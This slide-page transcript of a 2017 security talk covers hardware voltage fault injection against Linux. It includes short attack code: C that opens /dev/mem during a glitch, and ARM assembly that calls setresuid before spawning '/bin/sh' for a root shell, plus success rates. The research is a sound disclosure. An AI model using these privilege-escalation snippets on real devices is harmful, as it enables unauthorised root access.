kernelfault pwning linux using hardware fault injection
play

KERNELFAULT: Pwning Linux using Hardware Fault Injection Niek - PowerPoint PPT Presentation

Apr 08, 2024 •378 likes •1.08k views

KERNELFAULT: Pwning Linux using Hardware Fault Injection Niek Timmers Cristofaro Mune timmers@riscure.com c.mune@pulse-sec.com ( @ tieknimmers) ( @ pulsoid) September 22, 2017 Who are we? Niek Timmers (@tieknimmers) Security Analyst @

  1. KERNELFAULT: Pwning Linux using Hardware Fault Injection Niek Timmers Cristofaro Mune timmers@riscure.com c.mune@pulse-sec.com ( @ tieknimmers) ( @ pulsoid) September 22, 2017

  2. Who are we? Niek Timmers (@tieknimmers) • Security Analyst @ Riscure • Security testing of different products and technologies Cristofaro Mune (@pulsoid) • Product Security Consultant and Researcher • Loves the intermixing of HW and SW, IoT, TEEs, FI and anything else challenging my curiosity. We have shared interests • Embedded device security • Fault injection Not so much on the question if beer or wine is better...

  3. Who are we? Niek Timmers (@tieknimmers) • Security Analyst @ Riscure • Security testing of different products and technologies Cristofaro Mune (@pulsoid) • Product Security Consultant and Researcher • Loves the intermixing of HW and SW, IoT, TEEs, FI and anything else challenging my curiosity. We have shared interests • Embedded device security • Fault injection Not so much on the question if beer or wine is better...

  4. Fault Injection – A definition... ”Introducing faults in a target to alter its intended behavior.” ... if( key_is_correct ) <-- Glitch here! { open_door(); } else { keep_door_closed(); } ... How can we introduce these faults?

  5. Fault Injection – A definition... ”Introducing faults in a target to alter its intended behavior.” ... if( key_is_correct ) <-- Glitch here! { open_door(); } else { keep_door_closed(); } ... How can we introduce these faults?

  6. Fault injection techniques Clock Laser Voltage EM Remarks • These affect the target’s environmental conditions • All have their own characteristics • We used Voltage Fault Injection for all attacks

  7. Fault injection techniques Clock Laser Voltage EM Remarks • These affect the target’s environmental conditions • All have their own characteristics • We used Voltage Fault Injection for all attacks

  8. Fault injection fault model We like to keep it simple: instruction corruption Single-bit (MIPS) addi $t1, $t1, 8 00100001001010010000000000001000 addi $t1, $t1, 0 00100001001010010000000000000000 Multi-bit (ARM) ldr w1, [sp, #0x8] 10111001010000000000101111100001 str w7, [sp, #0x20] 10111001000000000010001111100111 Remarks • Limited control over which bit(s) will be corrupted • May or may not be the true fault model • Includes other fault models (e.g. instruction skipping)

  9. Some real world examples!

  10. Unlooper 1 – Hacking smart cards Remarks • Hacked smart cards were being disabled using infinite loop • Use a glitch to enable them again 1 https://en.wikipedia.org/wiki/Unlooper

  11. DFA – Recovering keys Similar attacks for most crypto algorithms!

  12. DFA – Recovering keys Similar attacks for most crypto algorithms!

  13. XBOX 2 – Bypassing secure boot Remarks • Use a glitch in the reset line to reset registers • Bypass hash comparison used by integrity check 2Video-game consoles architecture under microscope - R. Benadjila and M. Renard

  14. Nintendo 3 – Bypassing secure boot Remarks • Use a glitch to bypass length check: code execution • Dump decryption key from memory 3 https://media.ccc.de/v/33c3-8344-nintendo_hacking_2016

  15. BADFET 4 Remarks • Use an EM glitch to bypass secure boot of a Cisco phone • Not that invasive... (i.e. phone’s housing can be closed) 4 https://github.com/RedBalloonShenanigans/BADFET

  16. More fault injection during boot... 5 Why not use Fault Injection during runtime? 5 https://www.blackhat.com/docs/eu-16/materials/ eu-16-Timmers-Bypassing-Secure-Boot-Using-Fault-Injection.pdf

  17. More fault injection during boot... 5 Why not use Fault Injection during runtime? 5 https://www.blackhat.com/docs/eu-16/materials/ eu-16-Timmers-Bypassing-Secure-Boot-Using-Fault-Injection.pdf

  18. Fault injection meets Linux!

  19. How is Linux’ security usually compromised? A summary of Linux CVEs 6 Year DoS Exec Overflow Corruption Leak PrivEsc 2015 55 6 15 4 10 17 2016 153 5 38 18 35 52 2017 92 166 35 16 78 29 What if they are not present or not known? 6 http://www.cvedetails.com/product/47/Linux-Linux-Kernel.html?vendor_id=33

  20. How is Linux’ security usually compromised? A summary of Linux CVEs 6 Year DoS Exec Overflow Corruption Leak PrivEsc 2015 55 6 15 4 10 17 2016 153 5 38 18 35 52 2017 92 166 35 16 78 29 What if they are not present or not known? 6 http://www.cvedetails.com/product/47/Linux-Linux-Kernel.html?vendor_id=33

  21. Others 7 came to the same conclusion: Fault injection!!!! 7 https://derrekr.github.io/3ds/33c3/#/18

  22. Others 7 came to the same conclusion: Fault injection!!!! 7 https://derrekr.github.io/3ds/33c3/#/18

  23. Voltage fault injection setup Target • Fast and feature rich System-on-Chip (SoC) • ARM Cortex-A9 (32-bit) • Ubuntu 14.04 LTS (fully patched)

  24. Voltage fault injection parameters

  25. In the lab...

  26. On stage...

  27. Characterization • Determine if the target is vulnerable to fault injection • Determine if the fault injection setup is effective • Estimate required fault injection parameters for an attack • An open target is required, but not a requirement

  28. Characterization Test Application

  29. Characterization – Altering a loop . . . set_trigger(1); for(i = 0; i < 10000; i++) { // glitch here j++; // glitch here } // glitch here set_trigger(0); . . . Remarks • Implemented in a Linux Kernel Module (LKM) • Successful glitches are not time dependent

  30. Characterization – Possible responses Expected: ’glitch is too soft’ counter = 00010000 Mute/Reset: ’glitch is too hard’ counter = Success: ’glitch is exactly right’ counter = 00009999 counter = 00010015 counter = 00008687

  31. Characterization – Altering a loop Remarks • We took 16428 experiments in 65 hours • We randomize: Glitch VCC / Glitch Length / Glitch Delay • We can fix either the Glitch VCC or the Glitch Length

  32. Characterization – Altering a loop Remarks • We took 16428 experiments in 65 hours • We randomize: Glitch VCC / Glitch Length / Glitch Delay • We can fix either the Glitch VCC or the Glitch Length

  33. Characterization – Bypassing a check . . . set_trigger(1); if(cmd.cmdid < 0 || cmd.cmdid > 10) { return -1; } if(cmd.length > 0x100) { // glitch here return -1; // glitch here } // glitch here set_trigger(0); . . . Remarks • Implemented in a Linux Kernel Module (LKM) • Successful glitches are time dependent

  34. Characterization – Bypassing a check Remarks • We took 16315 experiments in 19 hours • The success rate between 6 . 2 µs and 6 . 8 µs is: 0.41% • The check is bypassed every 15 minutes

  35. We are ready for attack! Let’s attack Linux!

  36. We are ready for attack! Let’s attack Linux!

  37. Attacking Linux

  38. Opening /dev/mem – Description (1) Open /dev/mem using open syscall (2) Bypass check performed by Linux kernel using a glitch (3) Map arbitrary address in physical memory

  39. Opening /dev/mem – Code *(volatile unsigned int *)(trigger) = HIGH; int mem = open("/dev/mem", O_RDWR | O_SYNC); *(volatile unsigned int *)(trigger) = LOW; if( mem == 4 ) { void * addr = mmap ( 0, ..., ..., mem, 0); printf("%08x\n", *(unsigned int *)(addr)); } . . . Remarks • This code is running in user space • Linux syscall: sys open (0x5)

  40. Opening /dev/mem – Results Remarks • We took 22118 experiments in 17 hours • The success rate between 25 . 5 µs and 26 . 8 µs is: 0.53% • The Kernel is pwned every 10 minutes

  41. Linux kernel pwn #1

  42. SHellzapoppin’ – Description (1) Set all registers to 0 to increase the probability 8 (2) Perform setresuid syscall to set process IDs to root (3) Bypass check performed by Linux kernel using a glitch (4) Execute root shell using system function 8Linux kernel uses (mostly) return value 0 when a function executes successfully

  43. SHellzapoppin’ – Code *(volatile unsigned int *)(trigger) = HIGH; asm volatile ( "movw r12, #0x0;" // Repeat for other "movt r12, #0x0;" // unused registers . . . "mov r7, #0xd0;" // setresuid syscall "swi #0;" // Linux kernel takes over "mov %[ret], r0;" // Store return value in r0 : [ret] "=r" (ret) : : "r0", . . ., "r12" ) *(volatile unsigned int *)(trigger) = LOW; if(ret == 0) { system("/bin/sh"); } Remarks • This code is running in user space • Linux syscall: sys setresuid (0xd0)

  44. SHellzapoppin’ – Results Remarks • We took 18968 experiments in 21 hours • The success rate between 3 . 14 µs and 3 . 44 µs is: 1.3% • We pop a root shell every 5 minutes !

  45. Linux kernel pwn #2

  46. Reflection on these attacks... • Linux checks can be (easily) bypassed using fault injection • Attacks are identified and reproduced within a day • Full fault injection attack surface not explored Can we mitigate these type of attacks?

  47. Reflection on these attacks... • Linux checks can be (easily) bypassed using fault injection • Attacks are identified and reproduced within a day • Full fault injection attack surface not explored Can we mitigate these type of attacks?

Recommend

Fault Injection Characterization on ARM Cortex-A9 George Thessalonikefs

Fault Injection Characterization on ARM Cortex-A9 George Thessalonikefs

ElectroMagnetic Fault Injection Characterization on ARM Cortex-A9 George Thessalonikefs George.Thessalonikefs@os3.nl University of Amsterdam February 5, 2014 Introduction Hardware Fault Injection Induce faults to hardware through side

517 views • 26 slides
Escalating Privileges in Linux using Fault Injection Niek Timmers Cristofaro Mune

Escalating Privileges in Linux using Fault Injection Niek Timmers Cristofaro Mune

Escalating Privileges in Linux using Fault Injection Niek Timmers Cristofaro Mune timmers@riscure.com c.mune@pulse-sec.com ( @ tieknimmers) ( @ pulsoid) September 25, 2017 Fault Injection A definition... Introducing faults in a target

969 views • 47 slides
AVFI: Fault Injection for Autonomous Vehicles Fault Injection to Measure Resilience of AVs

AVFI: Fault Injection for Autonomous Vehicles Fault Injection to Measure Resilience of AVs

Saurabh Jha, Subho S. Banerjee , James Cyriac, Zbigniew T. Kalbarczyk and Ravishankar K. Iyer Computer Science, Electrical and Computer Engineering AVFI: Fault Injection for Autonomous Vehicles Fault Injection to Measure Resilience of AVs

215 views • 8 slides
Chiffre : A Confjgurable Hardware Fault Injection Framework for RISC-V Systems Schuyler Eldridge

Chiffre : A Confjgurable Hardware Fault Injection Framework for RISC-V Systems Schuyler Eldridge

IBM T. J. Watson Research Center Chiffre : A Confjgurable Hardware Fault Injection Framework for RISC-V Systems Schuyler Eldridge Alper Buyuktosunoglu Pradip Bose 2 nd Workshop on Computer Architecture Research with RISC-V Motivation: Selective

395 views • 15 slides
Can strace make you fail? strace syscall fault injection Dmitry Levin FOSDEM 2017 What is

Can strace make you fail? strace syscall fault injection Dmitry Levin FOSDEM 2017 What is

Can strace make you fail? strace syscall fault injection Dmitry Levin FOSDEM 2017 What is strace? A diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor interactions between processes and the Linux

541 views • 24 slides
Debunking Fault Injection Myths and Misconceptions Cristofaro Mune Niek Timmers

Debunking Fault Injection Myths and Misconceptions Cristofaro Mune Niek Timmers

Debunking Fault Injection Myths and Misconceptions Cristofaro Mune Niek Timmers c.mune@pulse-sec.com niek@twentytwosecurity.com @pulsoid @tieknimmers Todays agenda Introduction Fault injection, what is it? Fault injection,

920 views • 69 slides
Using Fault Injection to weaken RSA public key verification SNE Research Project 2 Ivo van der

Using Fault Injection to weaken RSA public key verification SNE Research Project 2 Ivo van der

Using Fault Injection to weaken RSA public key verification SNE Research Project 2 Ivo van der Elzen University of Amsterdam What is Fault Injection? Simply put: Introducing faults in a target to alter its intended behavior* *(N.

553 views • 34 slides
Symbolic Fault Injection Reiner H ahnle &amp; Daniel Larsson KeY Symposium Speyer, June 2006

Symbolic Fault Injection Reiner H ahnle &amp; Daniel Larsson KeY Symposium Speyer, June 2006

Symbolic Fault Injection Reiner H ahnle &amp; Daniel Larsson KeY Symposium Speyer, June 2006 1/28 Symbolic Fault Injection An attempt to introduce Formal Methods into the area of Fault Injection Objective: Evaluate dependability of

691 views • 28 slides
Characterization of a Cortex-M4 microcontroller with backside optical fault injection Research

Characterization of a Cortex-M4 microcontroller with backside optical fault injection Research

Characterization of a Cortex-M4 microcontroller with backside optical fault injection Research Project 1 Jasper Hupkens Dominika Rusek 05.02.2019 1 Introduction to the world of fault injection Research project at Riscure Fault

678 views • 25 slides
Using Fault Injection to Turn Data Transfers into Arbitrary Execution Cristofaro Mune Niek

Using Fault Injection to Turn Data Transfers into Arbitrary Execution Cristofaro Mune Niek

Using Fault Injection to Turn Data Transfers into Arbitrary Execution Cristofaro Mune Niek Timmers c.mune@pulse-sec.com niek@twentytwosecurity.com @pulsoid @tieknimmers Todays agenda Introduction Fault Injection basics Fault

1.05k views • 56 slides
Jrn-Marc Schmidt joern-marc.schmidt@iaik.tugraz.at Fault Injection Plaintext Faulty

Jrn-Marc Schmidt joern-marc.schmidt@iaik.tugraz.at Fault Injection Plaintext Faulty

Jrn-Marc Schmidt joern-marc.schmidt@iaik.tugraz.at Fault Injection Plaintext Faulty Ciphertext But how to inject a fault? Fault: Injection Model Exploitation Non-invasive Device is not altered physical Semi-invasive

602 views • 32 slides
Fault Injection in Mixed-Signal Environment Using Behavioral Fault Modeling in Verilog-A Seyed

Fault Injection in Mixed-Signal Environment Using Behavioral Fault Modeling in Verilog-A Seyed

Sharif University of Technology Department of Computer Engineering Dependable System Lab [DSL] Fault Injection in Mixed-Signal Environment Using Behavioral Fault Modeling in Verilog-A Seyed Nematollah Ahmadian, Seyed Ghassem Miremadi

398 views • 17 slides
Toward the bKAGRA Hardware Injection The 3rd KAGRA International Workshop 2017/05/21@Academia

Toward the bKAGRA Hardware Injection The 3rd KAGRA International Workshop 2017/05/21@Academia

Toward the bKAGRA Hardware Injection The 3rd KAGRA International Workshop 2017/05/21@Academia Sinica, NTU campus Osaka City University : Takaaki Yokozawa on the behalf of calibration subgroup The 3rd KIW Toward bKAGRA Hardware Injection

525 views • 15 slides
Embedded Processor Based Embedded Processor Based Fault Injection and SEU Fault Injection and

Embedded Processor Based Embedded Processor Based Fault Injection and SEU Fault Injection and

Embedded Processor Based Embedded Processor Based Fault Injection and SEU Fault Injection and SEU Emulation for FPGAs Emulation for FPGAs Bradley Dutton, Mustafa Ali, John Bradley Dutton, Mustafa Ali, John Sunwoo, and Charles Stroud Sunwoo,

305 views • 26 slides
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: &quot;SELECT

445 views • 32 slides
Optimizing Fault Injection in FMI Co-Simulation through Sensitivity Partitioning Mehrdad Moradi,

Optimizing Fault Injection in FMI Co-Simulation through Sensitivity Partitioning Mehrdad Moradi,

Optimizing Fault Injection in FMI Co-Simulation through Sensitivity Partitioning Mehrdad Moradi, Cludio Gomes, Bentley James Oakes and Joachim Denil Summersim 2019 July 22, 2019 Berlin, Germany Outline Introduction Context and

404 views • 28 slides
Robustness improvement of an SRAM cell against laser-induced fault injection A. Sarafianos a,b ,

Robustness improvement of an SRAM cell against laser-induced fault injection A. Sarafianos a,b ,

Robustness improvement of an SRAM cell against laser-induced fault injection A. Sarafianos a,b , C. Roscian b , J.M. Dutertre b , M. Lisart a , O. Gagliano a , V. Serradeil a , A. Tria b . a STMicroelectronics, Avenue Clestin Coq 13790 Rousset,

273 views • 14 slides
SoC, why should we care about Fault Injection Attacks ? Guillaume BOUFFARD (

SoC, why should we care about Fault Injection Attacks ? Guillaume BOUFFARD (

SoC, why should we care about Fault Injection Attacks ? Guillaume BOUFFARD ( guillaume.boufgard@ssi.gouv.fr ) David EL-BAZE ( david.elbaze@ssi.gouv.fr ) with the help of Thomas TROUCHKINE Agence nationale de la scurit des systmes

523 views • 28 slides
END-TO-END COMPARISON OF IR-LEVEL AND ASSEMBLY-LEVEL FAULT INJECTION Lucas Palazzi Co-authors:

END-TO-END COMPARISON OF IR-LEVEL AND ASSEMBLY-LEVEL FAULT INJECTION Lucas Palazzi Co-authors:

Practical Experience Report A TALE OF TWO INJECTORS: END-TO-END COMPARISON OF IR-LEVEL AND ASSEMBLY-LEVEL FAULT INJECTION Lucas Palazzi Co-authors: Guanpeng Li, Bo Fang, and Karthik Pattabiraman DEPART M ENT OF ELECT RIC AL AN D COM PUT ER

852 views • 56 slides
Summary Introduction &amp; Cryptographic Background Hardware Support for Physical Security

Summary Introduction &amp; Cryptographic Background Hardware Support for Physical Security

Summary Introduction &amp; Cryptographic Background Hardware Support for Physical Security Side Channel Attacks Arnaud Tisserand Fault Injection Attacks CNRS, Lab-STICC laboratory CRiSIS 2017, Dinard, France Protections Examples

266 views • 15 slides
More robust I2C designs with a new fault-injection driver Wolfram Sang, Consultant / Renesas

More robust I2C designs with a new fault-injection driver Wolfram Sang, Consultant / Renesas

More robust I2C designs with a new fault-injection driver Wolfram Sang, Consultant / Renesas ELCE17 Wolfram Sang, Consultant / Renesas Robust I2C with fault-injection ELCE17 1 / 24 Motivation It really got personal I2C maintainer since

258 views • 24 slides
Laser Fault Injection Attacks Wei He, Jakub Breier, Shivam Bhasin Physical Analysis and

Laser Fault Injection Attacks Wei He, Jakub Breier, Shivam Bhasin Physical Analysis and

Cheap &amp; Cheerful A Low-Cost Digital Sensor for Detecting Laser Fault Injection Attacks Wei He, Jakub Breier, Shivam Bhasin Physical Analysis and Cryptographic Engineering (PACE), Nanyang Technological University, Singapore SPACE 2016,

667 views • 31 slides
Towards Generic Countermeasures Against Fault Injection Attacks Gilles Barthe 2 , cois Dupressoir

Towards Generic Countermeasures Against Fault Injection Attacks Gilles Barthe 2 , cois Dupressoir

Towards Generic Countermeasures Against Fault Injection Attacks Gilles Barthe 2 , cois Dupressoir 2 , Sylvain Guilley 1 , Fran Pablo Rauzy 1 , Pierre-Yves Strub 2 1 Telecom ParisTech 2 IMDEA Software Institute Crypto Seminar Day @ IMDEA

101 views • 9 slides
strategies for successful fault injection Rafael Boix Carpi 1 , Stjepan Picek 2,3 , Lejla Batina 2

strategies for successful fault injection Rafael Boix Carpi 1 , Stjepan Picek 2,3 , Lejla Batina 2

Glitch it if you can: parameter search strategies for successful fault injection Rafael Boix Carpi 1 , Stjepan Picek 2,3 , Lejla Batina 2 , Federico Menarini 1 , Domagoj Jakobovic 3 and Marin Golub 3 1 Riscure BV, The Netherlands 2 Radboud

711 views • 33 slides

More recommend